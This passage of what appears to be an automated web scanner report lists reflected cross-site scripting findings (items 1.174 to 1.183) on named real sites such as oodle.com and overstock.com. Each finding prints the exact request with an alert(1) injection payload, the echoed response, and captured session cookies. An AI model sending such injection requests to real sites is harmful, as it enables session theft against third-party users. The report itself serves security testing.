Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:33:26 GMT
Content-Length: 18589
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjA2O30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
lyExtraFields = "houston-_-nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-error-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds prod4ae7"-alert(1)-"7616b8adb5d/register/","10000000","houston-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-error-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.174. http://www.oodle.com/pro/register/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /pro/register/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f11c"><script>alert(1)</script>b9d58303a91 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pro1f11c"><script>alert(1)</script>b9d58303a91/register/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:33:25 GMT
Content-Length: 18681
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjA1O30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/pro1f11c"><script>alert(1)</script>b9d58303a91/register/" />
...[SNIP]...

1.175. http://www.oodle.com/pro/register/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /pro/register/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 356cd"-alert(1)-"b9eeacb18a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pro/register356cd"-alert(1)-"b9eeacb18a4/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:33:27 GMT
Content-Length: 12339
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjA3O30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
elds = "houston-_-nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-error-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds pro/register356cd"-alert(1)-"b9eeacb18a4/","10000000","houston-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-error-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.176. http://www.oodle.com/pro/register/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /pro/register/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1776e"><script>alert(1)</script>c9260d89932 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pro/register1776e"><script>alert(1)</script>c9260d89932/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:33:26 GMT
Content-Length: 12398
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjA1O30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/pro/register1776e"><script>alert(1)</script>c9260d89932/" />
...[SNIP]...

1.177. http://www.overstock.com/Home-Garden/Franklin-Brown-Tufted-Bonded-Leather-Club-Chair/5036238/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Franklin-Brown-Tufted-Bonded-Leather-Club-Chair/5036238/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc878"style%3d"x%3aexpression(alert(1))"de327d4d908 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dc878"style="x:expression(alert(1))"de327d4d908 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Franklin-Brown-Tufted-Bonded-Leather-Club-Chair/5036238/product.html?dc878"style%3d"x%3aexpression(alert(1))"de327d4d908=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=4; mxcgotoast=; mxclastvisit=20101126; ostk_affiliate=; ostk_aggr_year=mxcuserseed^7936922902870390784|csbtmst^|csbcrt^|csbsfl^|mxcskupage^90|pageresult^90|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0; ostk_campaign=; mxccamid=; clubogiftcards=clubogctotal^0.00; mxcoriginal=; SSLB=B; cinfo=ccnt^0:ctmst^1290802672921; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:23:00 GMT
Server: Apache
Expires: Fri, 26 Nov 2010 20:23:00 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5036238|; Domain=.overstock.com; Expires=Sat, 26-Nov-2011 20:23:00 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101126; Domain=.overstock.com; Expires=Sat, 26-Nov-2011 20:23:00 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1290802980709; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 114368

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Fr
...[SNIP]...
<input type="hidden" name="dc878"style="x:expression(alert(1))"de327d4d908" value="1"/>
...[SNIP]...

1.178. http://www.overstock.com/Home-Garden/Mission-Brown-Tufted-Bonded-Leather-Storage-Ottoman-Bench/5036236/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Mission-Brown-Tufted-Bonded-Leather-Storage-Ottoman-Bench/5036236/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ac39"style%3d"x%3aexpression(alert(1))"b1de9c0f865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ac39"style="x:expression(alert(1))"b1de9c0f865 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Mission-Brown-Tufted-Bonded-Leather-Storage-Ottoman-Bench/5036236/product.html?5ac39"style%3d"x%3aexpression(alert(1))"b1de9c0f865=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=4; mxcgotoast=; mxclastvisit=20101126; ostk_affiliate=; ostk_aggr_year=mxcuserseed^7936922902870390784|csbtmst^|csbcrt^|csbsfl^|mxcskupage^90|pageresult^90|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0; ostk_campaign=; mxccamid=; clubogiftcards=clubogctotal^0.00; mxcoriginal=; SSLB=B; cinfo=ccnt^0:ctmst^1290802672921; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:22:57 GMT
Server: Apache
Expires: Fri, 26 Nov 2010 20:22:57 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1290802977172; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5036236|; Domain=.overstock.com; Expires=Sat, 26-Nov-2011 20:22:57 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101126; Domain=.overstock.com; Expires=Sat, 26-Nov-2011 20:22:57 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108036

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Mi
...[SNIP]...
<input type="hidden" name="5ac39"style="x:expression(alert(1))"b1de9c0f865" value="1"/>
...[SNIP]...

1.179. http://www.overstock.com/Home-Garden/Nottingham-Brown-Bonded-Leather-Folding-Storage-Ottoman/4783826/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Nottingham-Brown-Bonded-Leather-Folding-Storage-Ottoman/4783826/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd49a"style%3d"x%3aexpression(alert(1))"b5b8b6cc345 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd49a"style="x:expression(alert(1))"b5b8b6cc345 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Nottingham-Brown-Bonded-Leather-Folding-Storage-Ottoman/4783826/product.html?bd49a"style%3d"x%3aexpression(alert(1))"b5b8b6cc345=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=4; mxcgotoast=; mxclastvisit=20101126; ostk_affiliate=; ostk_aggr_year=mxcuserseed^7936922902870390784|csbtmst^|csbcrt^|csbsfl^|mxcskupage^90|pageresult^90|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0; ostk_campaign=; mxccamid=; clubogiftcards=clubogctotal^0.00; mxcoriginal=; SSLB=B; cinfo=ccnt^0:ctmst^1290802672921; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:22:58 GMT
Server: Apache
Expires: Fri, 26 Nov 2010 20:22:58 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4783826|; Domain=.overstock.com; Expires=Sat, 26-Nov-2011 20:22:58 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101126; Domain=.overstock.com; Expires=Sat, 26-Nov-2011 20:22:58 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1290802978022; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113243

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j33.overstock.com ssl:false -->


<head>

<title>No
...[SNIP]...
<input type="hidden" name="bd49a"style="x:expression(alert(1))"b5b8b6cc345" value="1"/>
...[SNIP]...

1.180. http://www.pressdisplay.com/pressdisplay/helpandsupport.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pressdisplay.com
Path:   /pressdisplay/helpandsupport.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35caa"style%3d"x%3aexpression(alert(1))"57642043def was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 35caa"style="x:expression(alert(1))"57642043def in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /pressdisplay/helpandsupport.aspx?subpage=PressdisplaySystemRequirements&35caa"style%3d"x%3aexpression(alert(1))"57642043def=1 HTTP/1.1
Host: www.pressdisplay.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=utf-8
Expires: Sat, 27 Nov 2010 20:23:34 GMT
Last-Modified: Fri, 26 Nov 2010 20:23:34 GMT
Vary: Host
Server: Microsoft-IIS/7.5
Set-Cookie: AProfile=56blCStE6bo+sGFMqnkh+mgqkKM=; expires=Mon, 26-Nov-2040 20:23:34 GMT; path=/pressdisplay/
X-AspNet-Version: 4.0.30319
wc: 1
Date: Fri, 26 Nov 2010 20:23:33 GMT
Connection: close
Content-Length: 13319


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><script type="text/javascript">
window.NDScriptsVers
...[SNIP]...
<a title="Overview" href="/pressdisplay/helpandsupport.aspx?subpage=PressdisplayOverview&35caa"style="x:expression(alert(1))"57642043def=1">
...[SNIP]...

1.181. http://www.rentalhomesplus.com/search/oasis.dll [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rentalhomesplus.com
Path:   /search/oasis.dll

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74bce"><a>2fdbf8c8381 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /search/oasis.dll?page=summarybz&property=311374.7&p=oodle&partner=oodle&74bce"><a>2fdbf8c8381=1 HTTP/1.1
Host: www.rentalhomesplus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: userSite=Active|True@TotalNumberOfUsers|100@NumberOfBetaUsers|0@UserSiteType|RHP@BaseURL|www@SiteId|2@BetaNumber|141@RedirectURL|http://www.rentalhomesplus.com@; domain=.rentalhomesplus.com; expires=Fri, 26-Oct-2012 19:23:43 GMT; path=/
Set-Cookie: ASP.NET_SessionId=4qsbu4453oz3hsmglufhubzx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 26 Nov 2010 20:23:43 GMT
Connection: close
Content-Length: 111215
Set-Cookie: aptspersistence=444667052.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_AptHead">


<!--BEG
...[SNIP]...
<a href="http://www.rentalhomesplus.com/locationbz.aspx?page=locationbz&property=311374.7&p=oodle&prvpg=59&partner=oodle&prvpg=59&74bce"><a>2fdbf8c8381=1&prvpg=59&pdriveit=0&pdrivefrm=1#MapDirections" class="Green-Link">
...[SNIP]...

1.182. http://www.rentalhomesplus.com/search/oasis.dll [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rentalhomesplus.com
Path:   /search/oasis.dll

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ea6b"%3bcd3001d760d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8ea6b";cd3001d760d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/oasis.dll?page=summarybz&property=311374.7&p=oodle&partner=oodle&8ea6b"%3bcd3001d760d=1 HTTP/1.1
Host: www.rentalhomesplus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: userSite=Active|True@TotalNumberOfUsers|100@NumberOfBetaUsers|0@UserSiteType|RHP@BaseURL|www@SiteId|2@BetaNumber|141@RedirectURL|http://www.rentalhomesplus.com@; domain=.rentalhomesplus.com; expires=Fri, 26-Oct-2012 19:23:51 GMT; path=/
Set-Cookie: ASP.NET_SessionId=1qimdz55b25gy345x1crpx45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 26 Nov 2010 20:23:51 GMT
Connection: close
Content-Length: 111157
Set-Cookie: aptspersistence=411112620.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_AptHead">


<!--BEG
...[SNIP]...
="text/javascript">
function doJump()
{
var urlParams;
var pagename;
var finalDest;
pagename = "printfriend";
urlParams = "&property=311374.7&amp;view=1&p=oodle&prvpg=59&partner=oodle&prvpg=59&8ea6b";cd3001d760d=1&prvpg=59";
finalDest =""+pagename+".aspx?page="+pagename+urlParams;
//alert(pagename);
//alert(urlParams);
window.open(finalDest);

}
</script>
...[SNIP]...

1.183. http://www.rentalhomesplus.com/search/oasis.dll [partner parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rentalhomesplus.com
Path:   /search/oasis.dll

Issue detail

The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fe3b"><a>180a3258f33 was submitted in the partner parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /search/oasis.dll?page=summarybz&property=311374.7&p=oodle&partner=oodle8fe3b"><a>180a3258f33 HTTP/1.1
Host: www.rentalhomesplus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
